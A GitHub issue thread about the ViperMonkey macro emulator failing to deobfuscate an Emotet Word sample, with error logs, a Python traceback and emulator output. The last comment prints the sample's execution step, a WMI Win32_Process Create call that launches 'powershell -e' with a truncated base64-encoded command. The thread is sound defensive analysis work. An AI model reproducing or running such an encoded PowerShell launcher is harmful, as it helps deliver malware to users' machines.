### ISSUE TITLE
Macro Code not fully deobfuscated

### ISSUE THREAD

**Issue by tobiashahn** [decalage2/ViperMonkey#70]
Issue:
ViperMonkey is not able to fully deobfuscate the VBA code in the most recent emotet samples. 

Sample:
https://app.any.run/tasks/1a9ea28d-c224-406a-bebd-6fe16d053c29

During the parsing, a couple of errors are shown in the console log:
```
INFO     Looking up doc var ['lcuagaaa'].mxqqa1dk
ERROR    Impossible to subtract arguments of different types. invalid literal for int() with base 10: "['lCUAGAAA'].MxQQA1Dk"
INFO     Looking up doc var ['lcuagaaa'].mxqqa1dk
ERROR    Impossible to subtract arguments of different types. invalid literal for int() with base 10: "['lCUAGAAA'].MxQQA1Dk"
INFO     Looking up doc var ['lcuagaaa'].mxqqa1dk
ERROR    Impossible to subtract arguments of different types. invalid literal for int() with base 10: "['lCUAGAAA'].MxQQA1Dk"
INFO     Looking up doc var ['lcuagaaa'].mxqqa1dk
INFO     Calling Procedure: ZZckD1Z('[False]')
ERROR    Procedure 'ZZckD1Z' not found
```

The analysis finishes with a still obfuscated script sample:
```
Recorded Actions:
+-------------------+---------------------------+---------------------------+
| Action            | Parameters                | Description               |
+-------------------+---------------------------+---------------------------+
| Found Entry Point | autoopen                  |                           |
| GetObject         | ["['nZAAGA'].AQAZAGAk['lC | Interesting Function Call |
|                   | UAGAAA'].tBDQAAoA.Control |                           |
|                   | Source"]                  |                           |
| Create            | ["['nZAAGA'].nQxQwAZ['lCU | Interesting Function Call |
|                   | AGAAA'].tBDQAAoA.ControlS |                           |
|                   | ource['nZAAGA'].GABxAxB[' |                           |
|                   | lCUAGAAA'].tBDQAAoA['lCUA |                           |
|                   | GAAA'].tBDQAAoA['nZAAGA'] |                           |
|                   | .fD1kACA['nZAAGA'].QQkQAk |                           |
|                   | ['lCUAGAAA'].tBDQAAoA.Con |                           |
|                   | trolSource['nZAAGA'].zQAw |                           |
|                   | UGc['lCUAGAAA'].tBDQAAoA. |                           |
|                   | ControlSource", 'NULL',   |                           |
|                   | 'NULL', "['lCUAGAAA'].tBD |                           |
|                   | QAAoA.ControlSource"]     |                           |
+-------------------+---------------------------+---------------------------+
```

**Comment by decalage2** [comment]
Could you please try the development version from Kirk Sayre? https://github.com/kirk-sayre-work/ViperMonkey
He might have addressed this issue already.

**Comment by tobiashahn** [comment]
Unfortunately the development does also not work, there I get the following errors:

When starting the analysis: 
```
FILE: emotet.doc
ERROR    Reading in file as Excel with xlrd failed. Can't find workbook in OLE2 compound document
ERROR    Cannot convert Excel file with LibreOffice. LibreOffice not installed.
INFO     Saving dropped analysis artifacts in emotet.doc_artifacts/
```

During the analysis:
```
PARSING VBA CODE:
INFO     parsed Function uGcAwB (): 3 statement(s)
INFO     parsed Sub ['autoopen'] (): 1 statement(s)
INFO     parsed Function CAAAX_X (): 14 statement(s)
INFO     parsed Function N1ZcQwCA (): 2 statement(s)
INFO     parsed Loose Lines Block: ([Function uGcAwB (): 3 statement(s ...): 4 statement(s)
INFO     parsed Function uGcAwB (): 3 statement(s)
INFO     parsed Sub ['autoopen'] (): 1 statement(s)
INFO     parsed Function CAAAX_X (): 14 statement(s)
INFO     parsed Function N1ZcQwCA (): 2 statement(s)
Module None
  Function CAAAX_X (): 14 statement(s)
  Sub ['autoopen'] (): 1 statement(s)
  Function N1ZcQwCA (): 2 statement(s)
  Function uGcAwB (): 3 statement(s)

Traceback (most recent call last):
  File "vmonkey.py", line 1164, in _process_file
    vm.add_compiled_module(m)
  File "/home/tobias/deobfuscation/ViperMonkey/vipermonkey/core/__init__.py", line 210, in add_compiled_module
    self.globals[name.lower()] = _function
TypeError: 'str' object is not callable
ERROR    'str' object is not callable
```

**Comment by k-sullivan** [comment]
No problem on the newest commit (2c4e88635d7cbbb75bb95820dd68d9d21dbae5c4). I haven't tested it with previous commits.
```
Recorded Actions:
+-------------------+---------------------------+---------------------------+
| Action            | Parameters                | Description               |
+-------------------+---------------------------+---------------------------+
| Found Entry Point | autoopen                  |                           |
| GetObject         | ['winmgmts:Win32_ProcessS | Interesting Function Call |
|                   | tartup']                  |                           |
| GetObject         | ['winmgmts:Win32_Process' | Interesting Function Call |
|                   | ]                         |                           |
| Create            | ['powershell -e JABoAHgAQ | Interesting Function Call |
|                   | wBBAGMAQQBBAFEAIAA9ACAAJw |                           |
|                   | A4ADAANQAnADsAJABGAFoAawB |                           |
|                   | DAHcAQQBBAFoAPQAoACIAewAw |                           |
|                   | AH0AewAxAH0AIgAgAC0AZgAnA |                           |
|                   | FEAVQBRAEEAJwAsACcAMQBDAC |                           |
|                   | cAKQA7ACQAbgBVAGsAMQAxAF8 |                           |
```
